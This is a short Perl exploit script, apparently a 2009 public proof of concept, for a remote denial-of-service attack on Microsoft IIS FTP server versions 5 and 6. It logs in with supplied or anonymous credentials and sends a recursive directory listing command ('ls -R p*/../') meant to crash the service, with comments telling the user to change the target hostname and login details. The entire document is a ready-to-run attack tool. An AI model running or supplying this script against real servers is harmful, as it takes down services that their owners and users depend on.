#!/usr/bin/perl

# IIS FTPD 5/6 remote DoS exploit.
# Bug found by Nikolaos Rangos.
#
# If users can read directories, this can be exploited.
# 
# Coded by Oscar Marques aka F-117.
# www.dunkelheit.com.br
# 19/10/09.
# Exploit usage: just change hostname / username / password.

my $VERSAO = '0.1';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

#Change this!

$hostname="127.0.0.1";
$username = "anonymous";
$password = "anonymous";

sub banner {
print ("\x49\x49\x53\x20\x46\x54\x50\x44\x20\x72\x65\x6d\x6f\x74\x65\x20\x44\x6f\x53\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\n\x43\x6f\x64\x65\x64\x20\x62\x79\x20\x46\x2d\x31\x31\x37\x2e\n\n");
}

{
use Net::FTP;
banner();
$ftp = Net::FTP->new("$hostname", Debug=>0);
die "[x] Cannot connect to $hostname  $!" unless $ftp;
$ftp->login("$username","$password", Debug=>0);
die "[x] Cannot login, check username and/or password" unless $ftp;
$ftp->cwd("/");
$ftp->ls("-R p*/../");
print ("[+] $hostname was attacked. Try to connect...\n\n");
$ftp->quit;
}